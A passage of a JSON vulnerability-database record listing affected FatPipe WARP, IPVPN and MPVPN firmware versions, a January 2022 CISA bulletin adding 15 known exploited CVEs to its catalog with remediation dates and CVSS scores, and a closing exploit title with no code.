"cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r129:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:6.1.2:r70p26:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:9.1.2:r161p26:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r164p5:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r156:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:9.1.2:r161p2:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:7.1.2:r39:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r161p12:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:9.1.2:r156:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:10.1.2:r60p32:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:9.1.2:r165:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:10.1.2:r60p13:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:9.1.2:r164:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:7.1.2:r39:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r161p3:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:10.1.2:r60p45:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:10.1.2:r60p10:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r180p2:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:10.2.2:r10:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:10.1.2:r60p58s1:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:7.1.2:r39:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:10.2.2:r10:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:10.1.2:r60p10:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:6.1.2:r70p75-m:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:9.1.2:r161p12:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:10.1.2:r60p58s1:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:9.1.2:r161p16:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:9.1.2:r164:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:10.1.2:r60p55:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:10.1.2:r60p35:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r161p26:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:9.1.2:r161p17:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:10.1.2:r60p55:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:10.1.2:r60p65:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:10.2.2:r38:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r185:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:9.1.2:r144:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:9.1.2:r161p17:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:9.1.2:r150:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:6.1.2:r70p45-m:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:9.1.2:r161p3:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:9.1.2:r164p5:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:10.2.2:r10:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:9.1.2:r180p2:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:10.1.2:r60p32:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:5.2.0:r34:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:9.1.2:r150:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:9.1.2:r164p5:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:6.1.2:r70p75-m:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r164:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r165:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:9.1.2:r161p20:*:*:*:*:*:*"]}], "cisa": [{"lastseen": "2022-01-26T11:29:15", "description": "CISA has added 15 new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.\n\n**CVE Number** | **CVE Title** | \n\n**Remediation \nDue Date** \n \n---|---|--- \nCVE-2021-22017 | VMware vCenter Server Improper Access Control Vulnerability | 1/24/2022 \nCVE-2021-36260 | Hikvision Improper Input Validation Vulnerability | 1/24/2022 \nCVE-2021-27860 | FatPipe WARP, IPVPN, and MPVPN Privilege Escalation vulnerability | 1/24/2022 \nCVE-2020-6572 | Google Chrome prior to 81.0.4044.92 Use-After-Free Vulnerability | 7/10/2022 \nCVE-2019-1458 | Microsoft Win32K Elevation of Privilege Vulnerability | 7/10/2022 \nCVE-2013-3900 | Microsoft WinVerify Trust Function Remote Code Execution Vulnerability | 7/10/2022 \nCVE-2019-2725 | Oracle WebLogic Server, Injection Vulnerability | 7/10/2022 \nCVE-2019-9670 | Synacor Zimbra Collaboration Suite Improper Restriction of XML External Entity Reference Vulnerability | 7/10/2022 \nCVE-2018-13382 | Fortinet FortiOS and FortiProxy Improper Authorization Vulnerability | 7/10/2022 \nCVE-2018-13383 | Fortinet FortiOS and FortiProxy Improper Authorization Vulnerability | 7/10/2022 \nCVE-2019-1579 | Palo Alto Networks PAN-OS Remote Code Execution Vulnerability | 7/10/2022 \nCVE-2019-10149 | Exim Mail Transfer Agent (MTA) Improper Input Validation Vulnerability | 7/10/2022 \nCVE-2015-7450 | IBM WebSphere Application Server and Server Hy Server Hypervisor Edition Remote Code Execution Vulnerability | 7/10/2022 \nCVE-2017-1000486 | Primetek Primefaces Application Remote Code Execution Vulnerability | 7/10/2022 \nCVE-2019-7609 | Elastic Kibana Remote Code Execution Vulnerability | 7/10/2022 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://www.cisa.gov/known-exploited-vulnerabilities>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities>). \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/01/10/cisa-adds-15-known-exploited-vulnerabilities-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-01-10T00:00:00", "type": "cisa", "title": "CISA Adds 15 Known Exploited Vulnerabilities to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-3900", "CVE-2015-7450", "CVE-2017-1000486", "CVE-2018-13382", "CVE-2018-13383", "CVE-2019-10149", "CVE-2019-1458", "CVE-2019-1579", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-6572", "CVE-2021-22017", "CVE-2021-27860", "CVE-2021-36260"], "modified": "2022-01-25T00:00:00", "id": "CISA:99DAB57F9B8063F8619B1A418B014DF1", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/01/10/cisa-adds-15-known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 CSRF Add Admin Exploit
